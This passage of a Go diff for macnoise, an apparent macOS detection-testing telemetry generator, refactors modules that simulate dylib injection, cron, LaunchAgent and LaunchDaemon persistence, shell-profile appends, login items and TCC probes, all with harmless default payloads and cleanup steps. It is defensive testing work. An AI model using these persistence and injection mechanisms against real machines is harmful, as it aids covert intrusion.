+	if set.Outcome != module.OutcomeExecuted {
 		t.Fatalf("quarantine set failed: %s", set.Message)
 	}
-	if !byType["xattr_quarantine_remove"].Success {
+	if byType["xattr_quarantine_remove"].Outcome != module.OutcomeExecuted {
 		t.Errorf("quarantine remove failed: %s", byType["xattr_quarantine_remove"].Message)
 	}
 	// The run ID must ride on the tagged file path.

--- a/modules/process/inject.go
+++ b/modules/process/inject.go
@@ -5,6 +5,7 @@ import (
 	"fmt"
 	"os"
 	"os/exec"
+	"path/filepath"
 	"strings"
 
 	"github.com/0xv1n/macnoise/internal/output"
@@ -106,7 +107,8 @@ func (p *procInject) Generate(ctx context.Context, params module.Params, emit mo
 	_, statErr := os.Stat(dylibPath)
 	outcome := classifyInjection(statErr == nil, stderr.String())
 
-	ev := output.NewEvent(info, "dylib_inject_attempt", true,
+	ev := output.NewEvent(info, "dylib_inject_attempt", module.OutcomeExecuted,
+		module.Process(filepath.Base(targetBin), targetBin, targetBin, 0),
 		fmt.Sprintf("spawned %s with DYLD_INSERT_LIBRARIES=%s", targetBin, dylibPath))
 	details := map[string]any{
 		"target":           targetBin,
@@ -128,8 +130,7 @@ func (p *procInject) Generate(ctx context.Context, params module.Params, emit mo
 		details["exit_error"] = runErr.Error()
 	}
 
-	emit(output.WithDetails(ev, details))
-	return nil
+	return emit(output.WithDetails(ev, details))
 }
 
 func (p *procInject) DryRun(params module.Params) []string {

--- a/modules/process/inject_integration_test.go
+++ b/modules/process/inject_integration_test.go
@@ -15,7 +15,7 @@ import (
 func runInject(t *testing.T, params module.Params) module.TelemetryEvent {
 	t.Helper()
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureProcessEvents(&events)
 
 	if err := (&procInject{}).Generate(context.Background(), params, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -35,8 +35,8 @@ func TestProcInject_DefaultTargetIsHonouredByDyld(t *testing.T) {
 	if got := ev.Details["outcome"]; got != "honored" {
 		t.Errorf("outcome = %v, want honored; dyld did not act on DYLD_INSERT_LIBRARIES for the default target", got)
 	}
-	if !ev.Success {
-		t.Error("Success = false; dyld aborting the child is the successful injection path, not a failure")
+	if ev.Outcome != module.OutcomeExecuted {
+		t.Errorf("Outcome = %q, want executed", ev.Outcome)
 	}
 }
 

--- a/modules/process/osascript.go
+++ b/modules/process/osascript.go
@@ -101,23 +101,22 @@ func (p *procOsascript) Generate(ctx context.Context, params module.Params, emit
 	script := stampScript(params.String("script", `display notification "macnoise telemetry" with title "MacNoise"`), language, module.RunIDFromContext(ctx))
 	info := p.Info()
 
-	ev := output.NewEvent(info, "osascript_exec", false, fmt.Sprintf("executing %s via osascript", language))
+	ev := output.NewEvent(info, "osascript_exec", module.OutcomeError, module.Process("osascript", "/usr/bin/osascript", script, 0), fmt.Sprintf("executing %s via osascript", language))
 	out, err := exec.CommandContext(ctx, "osascript", "-l", language, "-e", script).CombinedOutput()
 	if ctx.Err() != nil {
 		return ctx.Err()
 	}
 	safeOutput := sanitizeOsascriptOutput(script, string(out))
 	if err != nil {
-		ev.Success = true
+		ev.Outcome = module.OutcomeExecuted
 		ev.Message = fmt.Sprintf("osascript returned error (telemetry generated): %v", err)
 		ev = output.WithDetails(ev, map[string]any{"language": language, "script": script, "output": safeOutput, "error": err.Error()})
 	} else {
-		ev.Success = true
+		ev.Outcome = module.OutcomeExecuted
 		ev.Message = fmt.Sprintf("osascript executed %s successfully", language)
 		ev = output.WithDetails(ev, map[string]any{"language": language, "script": script, "output": safeOutput})
 	}
-	emit(ev)
-	return nil
+	return emit(ev)
 }
 
 func (p *procOsascript) DryRun(params module.Params) []string {

--- a/modules/process/osascript_exec_test.go
+++ b/modules/process/osascript_exec_test.go
@@ -35,14 +35,15 @@ func TestOsascriptGenerate_Execution(t *testing.T) {
 			ctx = module.ContextWithRunID(ctx, "osascript-test")
 			var events []module.TelemetryEvent
 			p := &procOsascript{}
-			err := p.Generate(ctx, module.Params{"language": tt.language, "script": tt.script}, func(ev module.TelemetryEvent) {
+			err := p.Generate(ctx, module.Params{"language": tt.language, "script": tt.script}, func(ev module.TelemetryEvent) error {
 				events = append(events, ev)
+				return nil
 			})
 			if err != nil || len(events) != 1 {
 				t.Fatalf("Generate = %v, events: %+v", err, events)
 			}
 			ev := events[0]
-			if ev.Module != "proc_osascript" || ev.EventType != "osascript_exec" || !ev.Success || ev.Details["language"] != tt.language {
+			if ev.Module != "proc_osascript" || ev.EventType != "osascript_exec" || ev.Outcome != module.OutcomeExecuted || ev.Details["language"] != tt.language {
 				t.Errorf("unexpected event: %+v", ev)
 			}
 			comment := "-- mn:osascript-test"
@@ -70,8 +71,9 @@ func TestOsascriptGenerate_Execution(t *testing.T) {
 func TestOsascriptGenerate_CanceledBeforeExecution(t *testing.T) {
 	ctx, cancel := context.WithCancel(context.Background())
 	cancel()
-	err := (&procOsascript{}).Generate(ctx, module.Params{"script": `return "unexpected"`}, func(ev module.TelemetryEvent) {
+	err := (&procOsascript{}).Generate(ctx, module.Params{"script": `return "unexpected"`}, func(ev module.TelemetryEvent) error {
 		t.Errorf("canceled script emitted result: %+v", ev)
+		return nil
 	})
 	if !errors.Is(err, context.Canceled) {
 		t.Fatalf("Generate = %v, want context.Canceled", err)
@@ -95,8 +97,9 @@ func TestOsascriptGenerate_CanceledDuringExecution(t *testing.T) {
 			var events []module.TelemetryEvent
 			done := make(chan error, 1)
 			go func() {
-				done <- (&procOsascript{}).Generate(ctx, module.Params{"script": script}, func(ev module.TelemetryEvent) {
+				done <- (&procOsascript{}).Generate(ctx, module.Params{"script": script}, func(ev module.TelemetryEvent) error {
 					events = append(events, ev)
+					return nil
 				})
 			}()
 			defer func() { cancel(); <-done }()

--- a/modules/process/signal.go
+++ b/modules/process/signal.go
@@ -4,6 +4,7 @@ package process
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os"
 	"os/exec"
@@ -20,16 +21,23 @@ func (p *procSignal) Generate(ctx context.Context, params module.Params, emit mo
 
 	cmd := exec.CommandContext(ctx, "sh", "-c", targetCmd)
 	if err := cmd.Start(); err != nil {
-		ev := output.NewEvent(info, "process_fork", false, "failed to fork target process")
+		ev := output.NewEvent(info, "process_fork", module.OutcomeError, module.Process("sh", "/bin/sh", targetCmd, 0), "failed to fork target process")
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
+	defer func() {
+		if cmd.ProcessState == nil {
+			_ = cmd.Process.Kill()
+			_ = cmd.Wait()
+		}
+	}()
 
 	pid := cmd.Process.Pid
-	forkEv := output.NewEvent(info, "process_fork", true, fmt.Sprintf("forked %q as PID %d", targetCmd, pid))
+	forkEv := output.NewEvent(info, "process_fork", module.OutcomeExecuted, module.Process("sh", "/bin/sh", targetCmd, pid), fmt.Sprintf("forked %q as PID %d", targetCmd, pid))
 	forkEv = output.WithDetails(forkEv, map[string]any{"pid": pid, "command": targetCmd})
-	emit(forkEv)
+	if err := emit(forkEv); err != nil {
+		return err
+	}
 
 	time.Sleep(100 * time.Millisecond)
 
@@ -43,14 +51,16 @@ func (p *procSignal) Generate(ctx context.Context, params module.Params, emit mo
 	}
 
 	for _, s := range signals {
-		sigEv := output.NewEvent(info, "signal_send", false, fmt.Sprintf("sending %s to PID %d", s.name, pid))
+		sigEv := output.NewEvent(info, "signal_send", module.OutcomeError, module.Process("sh", "/bin/sh", targetCmd, pid), fmt.Sprintf("sending %s to PID %d", s.name, pid))
 		if err := cmd.Process.Signal(s.sig); err != nil {
 			sigEv = output.WithError(sigEv, err)
 		} else {
-			sigEv.Success = true
+			sigEv.Outcome = module.OutcomeExecuted
 			sigEv = output.WithDetails(sigEv, map[string]any{"signal": s.name, "pid": pid})
 		}
-		emit(sigEv)
+		if err := emit(sigEv); err != nil {
+			return err
+		}
 		time.Sleep(50 * time.Millisecond)
 	}
 

--- a/modules/process/signal_integration_test.go
+++ b/modules/process/signal_integration_test.go
@@ -15,7 +15,7 @@ import (
 // the forked command's argv.
 func TestSignalGenerate_ForkThenSignals(t *testing.T) {
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureProcessEvents(&events)
 	ctx := module.ContextWithRunID(context.Background(), "sigrun3")
 	if err := (&procSignal{}).Generate(ctx, module.Params{"target_command": "sleep 2"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -24,7 +24,7 @@ func TestSignalGenerate_ForkThenSignals(t *testing.T) {
 	if len(events) == 0 || events[0].EventType != "process_fork" {
 		t.Fatalf("first event should be process_fork, got %+v", events)
 	}
-	if !events[0].Success {
+	if events[0].Outcome != module.OutcomeExecuted {
 		t.Fatalf("fork failed: %s", events[0].Message)
 	}
 

--- a/modules/process/spawn.go
+++ b/modules/process/spawn.go
@@ -5,6 +5,7 @@ package process
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os/exec"
 
@@ -52,19 +53,17 @@ func (p *procSpawn) Generate(ctx context.Context, params module.Params, emit mod
 	command := stampCommand(params.String("command", "echo 'Telemetry Payload Executed'"), module.RunIDFromContext(ctx))
 	info := p.Info()
 
-	ev := output.NewEvent(info, "process_spawn", false, fmt.Sprintf("spawning: sh -c %q", command))
+	ev := output.NewEvent(info, "process_spawn", module.OutcomeError, module.Process("sh", "/bin/sh", command, 0), fmt.Sprintf("spawning: sh -c %q", command))
 	cmd := exec.CommandContext(ctx, "sh", "-c", command)
 	out, err := cmd.CombinedOutput()
 	if err != nil {
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
-	ev.Success = true
+	ev.Outcome = module.OutcomeExecuted
 	ev.Message = fmt.Sprintf("process exited 0: sh -c %q", command)
 	ev = output.WithDetails(ev, map[string]any{"command": command, "output": string(out)})
-	emit(ev)
-	return nil
+	return emit(ev)
 }
 
 func (p *procSpawn) DryRun(params module.Params) []string {

--- a/modules/process/spawn_exec_test.go
+++ b/modules/process/spawn_exec_test.go
@@ -11,6 +11,13 @@ import (
 	"github.com/0xv1n/macnoise/pkg/module"
 )
 
+func captureProcessEvents(events *[]module.TelemetryEvent) module.EventEmitter {
+	return func(ev module.TelemetryEvent) error {
+		*events = append(*events, ev)
+		return nil
+	}
+}
+
 // Excluded on Windows for the same reason as es_process's exec test: Go's
 // os/exec there routes through an MSYS2/Cygwin sh that re-parses the command
 // line unlike real POSIX sh, which is not this module's target. CI runs this on
@@ -21,7 +28,7 @@ func TestSpawnGenerate_EmitsSuccess(t *testing.T) {
 	}
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureProcessEvents(&events)
 	err := (&procSpawn{}).Generate(context.Background(), module.Params{"command": "echo macnoise-spawn-test"}, emit)
 	if err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -30,7 +37,7 @@ func TestSpawnGenerate_EmitsSuccess(t *testing.T) {
 	if len(events) != 1 || events[0].EventType != "process_spawn" {
 		t.Fatalf("expected 1 process_spawn event, got %+v", events)
 	}
-	if !events[0].Success {
+	if events[0].Outcome != module.OutcomeExecuted {
 		t.Errorf("spawn of a plain echo should succeed: %s", events[0].Message)
 	}
 	if out, _ := events[0].Details["output"].(string); !strings.Contains(out, "macnoise-spawn-test") {
@@ -44,7 +51,7 @@ func TestSpawnGenerate_RunIDInCommand(t *testing.T) {
 	}
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureProcessEvents(&events)
 	ctx := module.ContextWithRunID(context.Background(), "spawnrun42")
 	if err := (&procSpawn{}).Generate(ctx, module.Params{"command": "echo hi"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)

--- a/modules/service/cron.go
+++ b/modules/service/cron.go
@@ -2,6 +2,7 @@ package service
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os/exec"
 	"strings"
@@ -84,28 +85,32 @@ func (s *svcCron) Generate(ctx context.Context, params module.Params, emit modul
 	marker := cronMarker(module.RunIDFromContext(ctx))
 	entry := fmt.Sprintf("%s %s %s", schedule, command, marker)
 
-	listEv := output.NewEvent(info, "cron_job_list", false, "listing current crontab entries")
+	listEv := output.NewEvent(info, "cron_job_list", module.OutcomeError, module.Service("crontab", "user", ""), "listing current crontab entries")
 	listOut, listErr := exec.CommandContext(ctx, "crontab", "-l").CombinedOutput()
 	existing, safe := classifyCrontabList(listOut, listErr)
 	if !safe {
 		listEv = output.WithError(listEv, fmt.Errorf("crontab -l failed without reporting an empty crontab, refusing to overwrite: %v: %s", listErr, strings.TrimSpace(string(listOut))))
-		emit(listEv)
-		return fmt.Errorf("svc_cron: cannot safely determine existing crontab contents, aborting rather than risk overwriting it: %w", listErr)
+		return errors.Join(
+			fmt.Errorf("svc_cron: cannot safely determine existing crontab contents, aborting rather than risk overwriting it: %w", listErr),
+			emit(listEv),
+		)
 	}
 
 	if listErr != nil {
-		listEv.Success = true
+		listEv.Outcome = module.OutcomeExecuted
 		listEv.Message = "no existing crontab (empty crontab)"
 		listEv = output.WithDetails(listEv, map[string]any{"entries": ""})
 	} else {
 		lineCount := len(strings.Split(strings.TrimSpace(existing), "\n"))
-		listEv.Success = true
+		listEv.Outcome = module.OutcomeExecuted
 		listEv.Message = fmt.Sprintf("retrieved crontab (%d lines)", lineCount)
 		listEv = output.WithDetails(listEv, map[string]any{"entries": existing})
 	}
-	emit(listEv)
+	if err := emit(listEv); err != nil {
+		return err
+	}
 
-	createEv := output.NewEvent(info, "cron_job_create", false, fmt.Sprintf("adding cron entry: %s", entry))
+	createEv := output.NewEvent(info, "cron_job_create", module.OutcomeError, module.Service("crontab", "user", ""), fmt.Sprintf("adding cron entry: %s", entry))
 	newCrontab := strings.TrimRight(existing, "\n") + "\n" + entry + "\n"
 	installCmd := exec.CommandContext(ctx, "crontab", "-")
 	installCmd.Stdin = strings.NewReader(newCrontab)
@@ -113,7 +118,7 @@ func (s *svcCron) Generate(ctx context.Context, params module.Params, emit modul
 		createEv = output.WithError(createEv, fmt.Errorf("%v: %s", err, out))
 	} else {
 		s.addedEntry = entry
-		createEv.Success = true
+		createEv.Outcome = module.OutcomeExecuted
 		createEv.Message = fmt.Sprintf("cron job installed: %s", entry)
 		createEv = output.WithDetails(createEv, map[string]any{
 			"schedule": schedule,
@@ -121,9 +126,7 @@ func (s *svcCron) Generate(ctx context.Context, params module.Params, emit modul
 			"entry":    entry,
 		})
 	}
-	emit(createEv)
-
-	return nil
+	return emit(createEv)
 }
 
 func (s *svcCron) DryRun(params module.Params) []string {

--- a/modules/service/cron_exec_test.go
+++ b/modules/service/cron_exec_test.go
@@ -88,8 +88,9 @@ func TestCronGenerate_InstallAndCleanup(t *testing.T) {
 			ctx = module.ContextWithRunID(ctx, runID)
 			var events []module.TelemetryEvent
 			params := module.Params{"schedule": "0 0 1 1 *", "command": "/usr/bin/true"}
-			if err := s.Generate(ctx, params, func(ev module.TelemetryEvent) {
+			if err := s.Generate(ctx, params, func(ev module.TelemetryEvent) error {
 				events = append(events, ev)
+				return nil
 			}); err != nil {
 				t.Fatalf("Generate: %v", err)
 			}
@@ -99,8 +100,8 @@ func TestCronGenerate_InstallAndCleanup(t *testing.T) {
 			if !exists || installed != want {
 				t.Fatalf("installed crontab = %q, want %q", installed, want)
 			}
-			if len(events) != 2 || events[0].EventType != "cron_job_list" || !events[0].Success ||
-				events[1].EventType != "cron_job_create" || !events[1].Success {
+			if len(events) != 2 || events[0].EventType != "cron_job_list" || events[0].Outcome != module.OutcomeExecuted ||
+				events[1].EventType != "cron_job_create" || events[1].Outcome != module.OutcomeExecuted {
 				t.Fatalf("events = %+v, want successful list then create", events)
 			}
 			if got := events[0].Details["entries"]; got != baseline {
@@ -139,15 +140,16 @@ func TestCronGenerate_InvalidSchedule(t *testing.T) {
 	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
 	defer cancel()
 	var events []module.TelemetryEvent
-	err := s.Generate(ctx, module.Params{"schedule": "invalid", "command": "/usr/bin/true"}, func(ev module.TelemetryEvent) {
+	err := s.Generate(ctx, module.Params{"schedule": "invalid", "command": "/usr/bin/true"}, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
+		return nil
 	})
 	if err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
-	if len(events) != 2 || events[0].EventType != "cron_job_list" || !events[0].Success ||
-		events[1].EventType != "cron_job_create" || events[1].Success ||
-		events[1].Outcome != module.OutcomeError || events[1].Error == "" {
+	if len(events) != 2 || events[0].EventType != "cron_job_list" || events[0].Outcome != module.OutcomeExecuted ||
+		events[1].EventType != "cron_job_create" || events[1].Outcome != module.OutcomeError ||
+		events[1].Error == "" {
 		t.Fatalf("events = %+v, want successful list then install error", events)
 	}
 	if got, _ := cronRead(t); got != baseline {

--- a/modules/service/launch_agent.go
+++ b/modules/service/launch_agent.go
@@ -5,6 +5,7 @@ package service
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os"
 	"os/exec"
@@ -76,6 +77,7 @@ func (s *svcLaunchAgent) Generate(ctx context.Context, params module.Params, emi
 	plistPath := filepath.Join(agentDir, label+".plist")
 	s.plistPath = plistPath
 	s.label = label
+	domain := guiDomain()
 
 	plistData := map[string]any{
 		"Label":            label,
@@ -84,44 +86,40 @@ func (s *svcLaunchAgent) Generate(ctx context.Context, params module.Params, emi
 		"KeepAlive":        false,
 	}
 
-	createEv := output.NewEvent(info, "launchagent_create", false, fmt.Sprintf("creating plist at %s", plistPath))
+	createEv := output.NewEvent(info, "launchagent_create", module.OutcomeError, module.Service(label, domain, plistPath), fmt.Sprintf("creating plist at %s", plistPath))
 	f, err := os.Create(plistPath)
 	if err != nil {
 		createEv = output.WithError(createEv, err)
-		emit(createEv)
-		return err
+		return errors.Join(err, emit(createEv))
 	}
 	enc := plist.NewEncoder(f)
 	enc.Indent("\t")
 	if err := enc.Encode(plistData); err != nil {
 		_ = f.Close()
 		createEv = output.WithError(createEv, err)
-		emit(createEv)
-		return err
+		return errors.Join(err, emit(createEv))
 	}
 	_ = f.Close()
 
-	createEv.Success = true
+	createEv.Outcome = module.OutcomeExecuted
 	createEv.Message = fmt.Sprintf("created LaunchAgent plist at %s", plistPath)
 	createEv = output.WithDetails(createEv, map[string]any{"path": plistPath, "label": label, "program": program})
-	emit(createEv)
+	if err := emit(createEv); err != nil {
+		return err
+	}
 
-	domain := guiDomain()
-	loadEv := output.NewEvent(info, "launchagent_load", false, fmt.Sprintf("bootstrapping %s into %s", label, domain))
+	loadEv := output.NewEvent(info, "launchagent_load", module.OutcomeError, module.Service(label, domain, plistPath), fmt.Sprintf("bootstrapping %s into %s", label, domain))
 	loadCmd := exec.CommandContext(ctx, "launchctl", bootstrapArgs(domain, plistPath)...)
 	out, err := loadCmd.CombinedOutput()
 	if err != nil {
 		loadEv = output.WithError(loadEv, fmt.Errorf("%v: %s", err, out))
-		emit(loadEv)
-		return nil
+		return emit(loadEv)
 	}
 	s.loaded = true
-	loadEv.Success = true
+	loadEv.Outcome = module.OutcomeExecuted
 	loadEv.Message = fmt.Sprintf("bootstrapped LaunchAgent %s into %s", label, domain)
 	loadEv = output.WithDetails(loadEv, map[string]any{"label": label, "plist": plistPath, "domain": domain})
-	emit(loadEv)
-
-	return nil
+	return emit(loadEv)
 }
 
 func (s *svcLaunchAgent) DryRun(params module.Params) []string {

--- a/modules/service/launch_agent_test.go
+++ b/modules/service/launch_agent_test.go
@@ -27,7 +27,7 @@ func TestSvcLaunchAgent_GenerateAndCleanup(t *testing.T) {
 
 	s := &svcLaunchAgent{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureServiceEvents(&events)
 
 	params := module.Params{"label": label, "program": "/usr/bin/true"}
 	if err := s.Generate(context.Background(), params, emit); err != nil {
@@ -50,7 +50,7 @@ func TestSvcLaunchAgent_GenerateAndCleanup(t *testing.T) {
 
 	var sawCreate bool
 	for _, ev := range events {
-		if ev.EventType == "launchagent_create" && ev.Success {
+		if ev.EventType == "launchagent_create" && ev.Outcome == module.OutcomeExecuted {
 			sawCreate = true
 		}
 	}

--- a/modules/service/launch_daemon.go
+++ b/modules/service/launch_daemon.go
@@ -2,6 +2,7 @@ package service
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os"
 	"os/exec"
@@ -63,44 +64,41 @@ func (s *svcLaunchDaemon) Generate(ctx context.Context, params module.Params, em
 		"KeepAlive":        false,
 	}
 
-	createEv := output.NewEvent(info, "launchdaemon_create", false, fmt.Sprintf("creating plist at %s", plistPath))
+	createEv := output.NewEvent(info, "launchdaemon_create", module.OutcomeError, module.Service(label, systemDomain, plistPath), fmt.Sprintf("creating plist at %s", plistPath))
 	f, err := os.Create(plistPath)
 	if err != nil {
 		createEv = output.WithError(createEv, err)
-		emit(createEv)
-		return err
+		return errors.Join(err, emit(createEv))
 	}
 	enc := plist.NewEncoder(f)
 	enc.Indent("\t")
 	if err := enc.Encode(plistData); err != nil {
 		_ = f.Close()
 		createEv = output.WithError(createEv, err)
-		emit(createEv)
-		return err
+		return errors.Join(err, emit(createEv))
 	}
 	_ = f.Close()
 	os.Chmod(plistPath, 0o644) //nolint:errcheck
 
-	createEv.Success = true
+	createEv.Outcome = module.OutcomeExecuted
 	createEv.Message = fmt.Sprintf("created LaunchDaemon plist at %s", plistPath)
 	createEv = output.WithDetails(createEv, map[string]any{"path": plistPath, "label": label, "program": program})
-	emit(createEv)
+	if err := emit(createEv); err != nil {
+		return err
+	}
 
-	loadEv := output.NewEvent(info, "launchdaemon_load", false, fmt.Sprintf("bootstrapping %s into %s", label, systemDomain))
+	loadEv := output.NewEvent(info, "launchdaemon_load", module.OutcomeError, module.Service(label, systemDomain, plistPath), fmt.Sprintf("bootstrapping %s into %s", label, systemDomain))
 	loadCmd := exec.CommandContext(ctx, "launchctl", bootstrapArgs(systemDomain, plistPath)...)
 	out, err := loadCmd.CombinedOutput()
 	if err != nil {
 		loadEv = output.WithError(loadEv, fmt.Errorf("%v: %s", err, out))
-		emit(loadEv)
-		return nil
+		return emit(loadEv)
 	}
 	s.loaded = true
-	loadEv.Success = true
+	loadEv.Outcome = module.OutcomeExecuted
 	loadEv.Message = fmt.Sprintf("bootstrapped LaunchDaemon %s into %s", label, systemDomain)
 	loadEv = output.WithDetails(loadEv, map[string]any{"label": label, "plist": plistPath, "domain": systemDomain})
-	emit(loadEv)
-
-	return nil
+	return emit(loadEv)
 }
 
 func (s *svcLaunchDaemon) DryRun(params module.Params) []string {

--- a/modules/service/launch_daemon_test.go
+++ b/modules/service/launch_daemon_test.go
@@ -12,6 +12,15 @@ import (
 	"howett.net/plist"
 )
 
+func captureServiceEvents(events *[]module.TelemetryEvent) module.EventEmitter {
+	return func(ev module.TelemetryEvent) error {
+		*events = append(*events, ev)
+		return nil
+	}
+}
+
+func discardServiceEvent(module.TelemetryEvent) error { return nil }
+
 func TestSvcLaunchDaemon_PrereqRequiresRoot(t *testing.T) {
 	s := &svcLaunchDaemon{}
 	err := s.CheckPrereqs(context.Background(), nil)
@@ -41,7 +50,7 @@ func TestSvcLaunchDaemon_GenerateAndCleanup(t *testing.T) {
 
 	s := &svcLaunchDaemon{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureServiceEvents(&events)
 
 	params := module.Params{"label": label, "program": "/usr/bin/true"}
 	if err := s.Generate(context.Background(), params, emit); err != nil {
@@ -64,7 +73,7 @@ func TestSvcLaunchDaemon_GenerateAndCleanup(t *testing.T) {
 
 	var sawCreate bool
 	for _, ev := range events {
-		if ev.EventType == "launchdaemon_create" && ev.Success {
+		if ev.EventType == "launchdaemon_create" && ev.Outcome == module.OutcomeExecuted {
 			sawCreate = true
 		}
 	}

--- a/modules/service/login_item.go
+++ b/modules/service/login_item.go
@@ -125,7 +125,7 @@ func (s *svcLoginItem) Generate(ctx context.Context, params module.Params, emit 
 	info := s.Info()
 	s.name = name
 
-	ev := output.NewEvent(info, "login_item_add", false,
+	ev := output.NewEvent(info, "login_item_add", module.OutcomeError, module.Service(name, "gui", targetPath),
 		fmt.Sprintf("adding login item %q -> %s (triggers ES_EVENT_TYPE_NOTIFY_BTM_LAUNCH_ITEM_ADD)", name, targetPath))
 	details := map[string]any{
 		"name":     name,
@@ -154,8 +154,7 @@ func (s *svcLoginItem) Generate(ctx context.Context, params module.Params, emit 
 	}
 
 	ev = output.WithOutcome(ev, outcome, err)
-	emit(output.WithDetails(ev, details))
-	return nil
+	return emit(output.WithDetails(ev, details))
 }
 
 // loginItemPresent verifies the add landed rather than trusting osascript's

--- a/modules/service/login_item_integration_test.go
+++ b/modules/service/login_item_integration_test.go
@@ -14,7 +14,7 @@ func runLoginItem(t *testing.T, e *svcLoginItem, params module.Params) module.Te
 	t.Helper()
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureServiceEvents(&events)
 	t.Cleanup(func() { _ = e.Cleanup(context.Background()) })
 
 	if err := e.Generate(context.Background(), params, emit); err != nil {
@@ -31,7 +31,7 @@ func runLoginItem(t *testing.T, e *svcLoginItem, params module.Params) module.Te
 // headless CI runner is guaranteed to have. The contract that must hold
 // everywhere is that the module never reports a broken tool for an environment
 // that merely refused or could not be reached: the outcome is one of the four
-// known values, and Success tracks it.
+// known values.
 func TestLoginItem_ClassifiesEnvironmentWithoutFailing(t *testing.T) {
 	ev := runLoginItem(t, &svcLoginItem{}, module.Params{"name": "MacNoiseLoginItemTest"})
 
@@ -40,9 +40,6 @@ func TestLoginItem_ClassifiesEnvironmentWithoutFailing(t *testing.T) {
 	}
 	switch ev.Outcome {
 	case module.OutcomeExecuted, module.OutcomeDenied, module.OutcomeIndeterminate:
-		if !ev.Success {
-			t.Errorf("outcome %q left Success false; only a real macnoise fault should", ev.Outcome)
-		}
 	case module.OutcomeError:
 		t.Errorf("adding a login item reported a macnoise failure: %s", ev.Error)
 	default:

--- a/modules/service/shell_profile.go
+++ b/modules/service/shell_profile.go
@@ -2,6 +2,7 @@ package service
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os"
 	"path/filepath"
@@ -67,30 +68,27 @@ func (s *svcShellProfile) Generate(ctx context.Context, params module.Params, em
 	}
 	block := fmt.Sprintf("\n%s\n%s\n%s\n", startMarker, payload, shellProfileMarkerEnd)
 
-	ev := output.NewEvent(info, "shell_profile_modify", false, fmt.Sprintf("appending persistence marker to %s", target))
+	ev := output.NewEvent(info, "shell_profile_modify", module.OutcomeError, module.File(target), fmt.Sprintf("appending persistence marker to %s", target))
 	f, err := os.OpenFile(target, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0o644)
 	if err != nil {
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
 	_, writeErr := f.WriteString(block)
 	_ = f.Close()
 	if writeErr != nil {
 		ev = output.WithError(ev, writeErr)
-		emit(ev)
-		return writeErr
+		return errors.Join(writeErr, emit(ev))
 	}
 
-	ev.Success = true
+	ev.Outcome = module.OutcomeExecuted
 	ev.Message = fmt.Sprintf("persistence marker block appended to %s", target)
 	ev = output.WithDetails(ev, map[string]any{
 		"target":  target,
 		"payload": payload,
 		"block":   block,
 	})
-	emit(ev)
-	return nil
+	return emit(ev)
 }
 
 func (s *svcShellProfile) DryRun(params module.Params) []string {

--- a/modules/service/shell_profile_test.go
+++ b/modules/service/shell_profile_test.go
@@ -21,7 +21,7 @@ func TestSvcShellProfile_CleanupRestoresOriginalContent(t *testing.T) {
 
 	s := &svcShellProfile{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureServiceEvents(&events)
 
 	params := module.Params{"target": target, "payload": "export MACNOISE_PERSIST=1"}
 	if err := s.Generate(context.Background(), params, emit); err != nil {
@@ -39,7 +39,7 @@ func TestSvcShellProfile_CleanupRestoresOriginalContent(t *testing.T) {
 		t.Error("Generate must append, not overwrite existing profile content")
 	}
 
-	if len(events) != 1 || events[0].EventType != "shell_profile_modify" || !events[0].Success {
+	if len(events) != 1 || events[0].EventType != "shell_profile_modify" || events[0].Outcome != module.OutcomeExecuted {
 		t.Errorf("expected one successful shell_profile_modify event, got %+v", events)
 	}
 
@@ -64,7 +64,7 @@ func TestSvcShellProfile_CleanupRemovesRepeatedBlocks(t *testing.T) {
 		t.Fatalf("seed profile: %v", err)
 	}
 
-	emit := func(module.TelemetryEvent) {}
+	emit := discardServiceEvent
 	params := module.Params{"target": target, "payload": "export MACNOISE_PERSIST=1"}
 
 	s := &svcShellProfile{}

--- a/modules/tcc/accessibility.go
+++ b/modules/tcc/accessibility.go
@@ -82,7 +82,7 @@ func (t *tccAccessibility) Generate(ctx context.Context, params module.Params, e
 	combined := strings.TrimSpace(string(out))
 	outcome := accessibilityOutcome(err, combined)
 
-	ev := output.NewEvent(info, "tcc_accessibility_probe", true, "probing Accessibility via System Events")
+	ev := output.NewEvent(info, "tcc_accessibility_probe", outcome, module.Resource("tcc_accessibility", "System Events UI", ""), "probing Accessibility via System Events")
 	details := map[string]any{"result": string(outcome), "method": "osascript System Events UI read"}
 
 	switch outcome {
@@ -101,8 +101,7 @@ func (t *tccAccessibility) Generate(ctx context.Context, params module.Params, e
 		probeErr = fmt.Errorf("osascript: %v: %s", err, combined)
 	}
 	ev = output.WithOutcome(ev, outcome, probeErr)
-	emit(output.WithDetails(ev, details))
-	return nil
+	return emit(output.WithDetails(ev, details))
 }
 
 func (t *tccAccessibility) DryRun(params module.Params) []string {

--- a/modules/tcc/contacts.go
+++ b/modules/tcc/contacts.go
